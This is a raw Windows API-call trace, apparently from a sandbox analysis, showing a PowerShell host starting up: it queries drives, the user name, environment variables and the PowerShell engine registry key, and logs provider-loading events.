	[0540.763] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d220 | out: lpFileInformation=0x12d220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0540.763] SetErrorMode (uMode=0x1) returned 0x1
	[0540.764] GetLogicalDrives () returned 0x4
	[0540.765] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0540.766] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0540.766] SetErrorMode (uMode=0x1) returned 0x1
	[0540.767] CoTaskMemAlloc (cb=0x68) returned 0x3775c0
	[0540.767] CoTaskMemAlloc (cb=0x68) returned 0x377550
	[0540.767] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3775c0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x12d1f0, lpMaximumComponentLength=0x12d1ec, lpFileSystemFlags=0x12d1e8, lpFileSystemNameBuffer=0x377550, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12d1f0*=0x9c354b42, lpMaximumComponentLength=0x12d1ec*=0xff, lpFileSystemFlags=0x12d1e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0540.767] CoTaskMemFree (pv=0x3775c0) 
	[0540.767] CoTaskMemFree (pv=0x377550) 
	[0540.767] SetErrorMode (uMode=0x1) returned 0x1
	[0540.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0540.769] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0540.769] SetErrorMode (uMode=0x1) returned 0x1
	[0540.769] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d190 | out: lpFileInformation=0x12d190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0540.769] SetErrorMode (uMode=0x1) returned 0x1
	[0540.769] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0540.769] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0540.769] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0540.770] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cd10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0540.770] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0540.771] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0540.771] SetErrorMode (uMode=0x1) returned 0x1
	[0540.771] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cfc0 | out: lpFileInformation=0x12cfc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0540.771] SetErrorMode (uMode=0x1) returned 0x1
	[0540.771] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0540.771] SetErrorMode (uMode=0x1) returned 0x1
	[0540.771] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cfc0 | out: lpFileInformation=0x12cfc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0540.771] SetErrorMode (uMode=0x1) returned 0x1
	[0540.772] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0540.772] SetErrorMode (uMode=0x1) returned 0x1
	[0540.772] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d060 | out: lpFileInformation=0x12d060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0540.772] SetErrorMode (uMode=0x1) returned 0x1
	[0540.772] CoTaskMemAlloc (cb=0x804) returned 0x1b848210
	[0540.772] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b848210, nSize=0x12d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d468) returned 0x1
	[0540.773] CoTaskMemFree (pv=0x1b848210) 
	[0540.773] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0540.773] GetUserNameW (in: lpBuffer=0x301a20, pcbBuffer=0x12d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4a8) returned 1
	[0540.773] CoTaskMemFree (pv=0x301a20) 
	[0540.774] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ead878*="FileSystem", lpRawData=0x2ead608) returned 1
	[0540.775] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0540.775] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.775] CoTaskMemFree (pv=0x2c1aa0) 
	[0540.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0540.777] CoTaskMemAlloc (cb=0x804) returned 0x1b848210
	[0540.777] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b848210, nSize=0x12d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d468) returned 0x1
	[0540.777] CoTaskMemFree (pv=0x1b848210) 
	[0540.777] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0540.777] GetUserNameW (in: lpBuffer=0x301a20, pcbBuffer=0x12d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4a8) returned 1
	[0540.778] CoTaskMemFree (pv=0x301a20) 
	[0540.778] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eb30b8*="Function", lpRawData=0x2eb2e48) returned 1
	[0540.782] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0540.782] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0540.782] CoTaskMemFree (pv=0x2c1aa0) 
	[0541.754] CoTaskMemAlloc (cb=0x804) returned 0x1b848210
	[0541.754] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b848210, nSize=0x12d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d468) returned 0x1
	[0541.755] CoTaskMemFree (pv=0x1b848210) 
	[0541.755] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0541.755] GetUserNameW (in: lpBuffer=0x301a20, pcbBuffer=0x12d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4a8) returned 1
	[0541.756] CoTaskMemFree (pv=0x301a20) 
	[0541.756] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed58e0*="Registry", lpRawData=0x2ed5670) returned 1
	[0542.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0542.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0542.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0542.408] CoTaskMemAlloc (cb=0x804) returned 0x1b848210
	[0542.408] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b848210, nSize=0x12d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d468) returned 0x1
	[0542.408] CoTaskMemFree (pv=0x1b848210) 
	[0542.409] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0542.409] GetUserNameW (in: lpBuffer=0x301a20, pcbBuffer=0x12d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4a8) returned 1
	[0542.409] CoTaskMemFree (pv=0x301a20) 
	[0542.409] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2edacf8*="Variable", lpRawData=0x2edaa88) returned 1
	[0542.449] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0542.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0542.449] CoTaskMemFree (pv=0x2c1aa0) 
	[0542.452] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0542.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0542.452] CoTaskMemFree (pv=0x2c1aa0) 
	[0542.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0542.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0542.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0542.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0543.462] CoTaskMemAlloc (cb=0x804) returned 0x1b848210
	[0543.462] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b848210, nSize=0x12d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d468) returned 0x1
	[0543.463] CoTaskMemFree (pv=0x1b848210) 
	[0543.463] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0543.463] GetUserNameW (in: lpBuffer=0x301a20, pcbBuffer=0x12d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d4a8) returned 1
	[0543.463] CoTaskMemFree (pv=0x301a20) 
	[0543.464] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eeeb50*="Certificate", lpRawData=0x2eee8e0) returned 1
	[0543.623] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0543.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.623] CoTaskMemFree (pv=0x2c1aa0) 
	[0543.626] GetLogicalDrives () returned 0x4
	[0543.626] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0543.626] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0543.628] CoTaskMemAlloc (cb=0x20e) returned 0x35f1a0
	[0543.628] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x35f1a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0543.628] CoTaskMemFree (pv=0x35f1a0) 
	[0543.629] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0543.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.629] CoTaskMemFree (pv=0x2c1aa0) 
	[0543.629] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0543.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.630] CoTaskMemFree (pv=0x2c1aa0) 
	[0543.649] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0543.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.649] CoTaskMemFree (pv=0x2c1aa0) 
	[0543.650] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0543.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.650] CoTaskMemFree (pv=0x2c1aa0) 
	[0543.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0543.651] SetErrorMode (uMode=0x1) returned 0x1
	[0543.651] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d0b0 | out: lpFileInformation=0x12d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0543.651] SetErrorMode (uMode=0x1) returned 0x1
	[0543.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0543.651] SetErrorMode (uMode=0x1) returned 0x1
	[0543.651] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d0b0 | out: lpFileInformation=0x12d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0543.651] SetErrorMode (uMode=0x1) returned 0x1
	[0543.652] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0543.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.652] CoTaskMemFree (pv=0x2c1aa0) 
	[0543.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0543.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0543.659] SetErrorMode (uMode=0x1) returned 0x1
	[0543.659] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d370 | out: lpFileInformation=0x12d370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0543.659] SetErrorMode (uMode=0x1) returned 0x1
	[0544.535] CoTaskMemAlloc (cb=0x804) returned 0x1b848210
	[0544.535] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b848210, nSize=0x12d6d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d6d8) returned 0x1
	[0544.536] CoTaskMemFree (pv=0x1b848210) 
	[0544.536] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0544.536] GetUserNameW (in: lpBuffer=0x301a20, pcbBuffer=0x12d718 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d718) returned 1
	[0544.536] CoTaskMemFree (pv=0x301a20) 
	[0544.537] ReportEventW (hEventLog=0x1b9f0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f27838*="Available", lpRawData=0x2f275c8) returned 1
	[0545.660] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0545.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.660] CoTaskMemFree (pv=0x2c1aa0) 
	[0545.661] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0545.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.662] CoTaskMemFree (pv=0x2c1aa0) 
	[0545.664] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0545.665] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0545.665] CoTaskMemFree (pv=0x2c1aa0) 
	[0545.665] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0545.665] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0545.665] CoTaskMemFree (pv=0x2c1aa0) 
	[0545.668] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6f8 | out: phkResult=0x12d6f8*=0x398) returned 0x0
	[0545.668] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d67c, lpData=0x0, lpcbData=0x12d678*=0x0 | out: lpType=0x12d67c*=0x1, lpData=0x0, lpcbData=0x12d678*=0x56) returned 0x0
	[0545.668] CoTaskMemAlloc (cb=0x5a) returned 0x1b8373b0
	[0545.668] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d64c, lpData=0x1b8373b0, lpcbData=0x12d648*=0x56 | out: lpType=0x12d64c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d648*=0x56) returned 0x0
	[0545.668] CoTaskMemFree (pv=0x1b8373b0) 
	[0545.668] RegCloseKey (hKey=0x398) returned 0x0
	[0545.670] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0545.670] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0545.670] CoTaskMemFree (pv=0x2c1aa0) 
	[0546.617] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0546.617] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.617] CoTaskMemFree (pv=0x2c1aa0) 
	[0547.549] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0547.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.549] CoTaskMemFree (pv=0x2c1aa0) 
	[0547.549] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0547.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.550] CoTaskMemFree (pv=0x2c1aa0) 
	[0547.553] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0547.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.553] CoTaskMemFree (pv=0x2c1aa0) 
	[0547.554] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0547.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.554] CoTaskMemFree (pv=0x2c1aa0) 
	[0547.558] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0547.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.559] CoTaskMemFree (pv=0x2c1aa0) 
	[0547.559] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0547.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0547.559] CoTaskMemFree (pv=0x2c1aa0) 
	[0549.548] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0549.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0549.548] CoTaskMemFree (pv=0x2c1aa0) 
	[0553.129] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2c1ee0
	[0553.131] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2c1ff0
	[0562.514] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0562.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.515] CoTaskMemFree (pv=0x2c2100) 
	[0562.519] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0562.519] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0562.519] CoTaskMemFree (pv=0x2c2100) 
	[0563.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
